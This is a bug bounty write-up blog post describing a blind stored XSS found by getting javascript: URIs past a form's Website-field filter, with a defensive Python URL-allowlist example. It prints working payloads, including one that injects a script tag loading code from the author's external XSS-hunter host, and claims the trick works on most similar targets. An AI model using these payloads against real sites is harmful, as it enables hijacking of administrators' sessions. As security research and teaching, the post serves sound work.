Hello Pentesters,

I’m Youssef A. Mohamed aka GeneralEG

Today I’m gonna share a juicy finding with you.

It's about bypassing a couple of filters to execute malicious JavaScript code easily and achieve a Blind Stored XSS.

“I found this issue in a lot of targets, so I will take one of these programs as an example.”

The program is private so let’s call it redacted.com

  • Recently I was testing this program, and after some recon I found that the website offers a specific service (Create Forms).

How does this service work?
1) The creator user creates a form.
2) The creator user shares the link with a visitor.
3) The visitor fills in the form.
4) The submitted information is available to the form's creator at redacted.com/manager/{Form ID}/

So while testing the “Creating form” functions, I found that there's a Website input.

I made a simple form.

Then I opened the form as a visitor.

At first I tried to bypass it in the basic way
(I thought that if I wrote website.com?"payload it would be executed).

So I entered:
https://example.com/?"%22"

(" + URL-encoded + HTML-entity-encoded)

Then I opened the creator account to see what happened.

But unfortunately the filter encoded the double quotes:
https://example.com"%22"

and I noticed that the link is rendered inside an <a> tag.

So I decided to grab a cup of coffee :"D

  • After a few minutes of deep thinking, while drinking my coffee, about how I would bypass this one,

I decided to start fuzzing this input specifically: {Enter Website}

While I was fuzzing, I noticed that the filter accepted test:https://example.com !

Then I tried javascript:https//evil.com
and it worked 😀
“Evil loud laugh”

  • Now I was sure that there's XSS here,
    but it needs a real website merged with my payload, so I wrote this one:

javascript:x='http://x.c';alert('xss');//

Finally executed!

  • But wait, we want to make it Blind XSS to attack the real admins (the best scenario).

So the last payload was:

javascript:eval('a=document.createElement(\'script\');a.src=\'https://generaleg.xss.ht\';document.body.appendChild(a)');s='https://s.com'

¯\_(ツ)_/¯

That's it!

Notes:

  •  80% of my targets which had a Website input were vulnerable to the same scenario.
  •  To make sure that your target is vulnerable to the same problem, you need a few steps:

A. Check whether the website accepts other URI schemes, like javascript:https://generaleg0x01.com, or not.

B. Check whether the website renders your https://generaleg0x01.com inside an HTML 'a' tag or not.

  • In most similar situations the same payload will work perfectly.
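The defensive counterpart of checks A and B, as an added example that is not the target's code: a scheme allowlist for the Website field, applied server-side before the value is ever rendered into an <a> tag. All function and constant names here are mine, and the inputs it is meant to reject are the payloads from this post.

```python
import html
import re
from typing import Optional
from urllib.parse import urlsplit

# Assumption: the form's "Website" field is stored server-side and later rendered
# into <a href="..."> for the form's creator, so it must be validated here.
ALLOWED_SCHEMES = {"http", "https"}

# Browsers strip ASCII control characters and whitespace before parsing a URL,
# so "\tjavascript:..." still runs as javascript; reject such input outright
# rather than trying to normalise it.
_CONTROL_OR_WS = re.compile(r"[\x00-\x20\x7f]")


def validate_website_url(value: str) -> Optional[str]:
    """Return a normalised http(s) URL, or None if the value must be rejected.

    Rejects by scheme allowlist, not by blocklist: "javascript:", "test:",
    "JavaScript:" and any scheme invented tomorrow all fail the same check.
    """
    if not isinstance(value, str) or not value or len(value) > 2048:
        return None
    if _CONTROL_OR_WS.search(value):
        return None
    try:
        parts = urlsplit(value)
    except ValueError:  # e.g. malformed IPv6 literal in the host part
        return None
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return None
    # "javascript:https//evil.com" has a scheme but no host; a website must have one.
    if not parts.hostname:
        return None
    return parts.geturl()


def render_website_link(value: str) -> str:
    """Render the field as an anchor, or an empty string if it was rejected.

    Output encoding (html.escape) handles quotes and angle brackets; it does
    not, on its own, stop a javascript: URL, which is why validation runs first.
    """
    url = validate_website_url(value)
    if url is None:
        return ""
    safe = html.escape(url, quote=True)
    return f'<a href="{safe}" rel="noopener noreferrer nofollow">{safe}</a>'
```

Encoding the quotes (what the filter in this post did) only closes the attribute-injection route; the allowlist is what closes the scheme route.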

Timeline:
20 December, 2018: Report Submitted
25 December, 2018: Report Reviewed and Triaged
30 December, 2018: Report Resolved & $800 Bounty Awarded

Lessons learned:

  •  Fuzz as much as you can.
  •  Don't try only one technique to bypass the filter; try other techniques.

A minute please!

Building a website, an application or any kind of business? Or already have one? Worried about your security? Contact me before going public and let me protect your business!

6 thoughts on “Hack Your Form – New vector for Blind XSS”
